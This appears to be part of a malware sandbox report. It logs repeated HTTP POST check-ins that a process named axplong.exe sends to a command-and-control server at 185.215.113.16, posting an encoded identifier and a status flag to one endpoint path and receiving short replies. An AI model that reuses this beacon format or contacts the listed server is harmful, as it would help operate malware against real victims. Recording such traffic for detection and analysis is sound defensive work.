Jul 26, 2024 12:57:19.827367067 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:20.077128887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	60795	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:20.185275078 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:21.028665066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:21.029454947 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:21.293243885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	60797	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:21.419518948 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:22.344541073 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:22.345284939 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:22.612396002 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	60799	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:22.734181881 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:23.574168921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:23.577545881 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:23.829962015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	60802	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:23.950633049 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:24.757379055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:24.758198023 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:25.011086941 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	60804	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:25.140710115 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:25.940911055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:25.941627026 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:26.221061945 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	60806	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:26.344706059 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:27.129156113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:27.129998922 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:27.749998093 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 12:57:27.753882885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	60808	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:27.924710035 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:28.688013077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:28.710248947 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:29.005683899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	60810	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:29.123203039 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:29.919595957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:29.920393944 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:30.175187111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	60811	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:30.295030117 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:31.102684021 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:31.103522062 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:31.396799088 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	60813	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:31.513214111 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:32.278377056 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:32.280910969 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:32.533971071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	60814	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:32.904742002 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:33.682446003 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:33.683307886 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:33.939444065 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	60816	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:34.059674025 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:34.910520077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
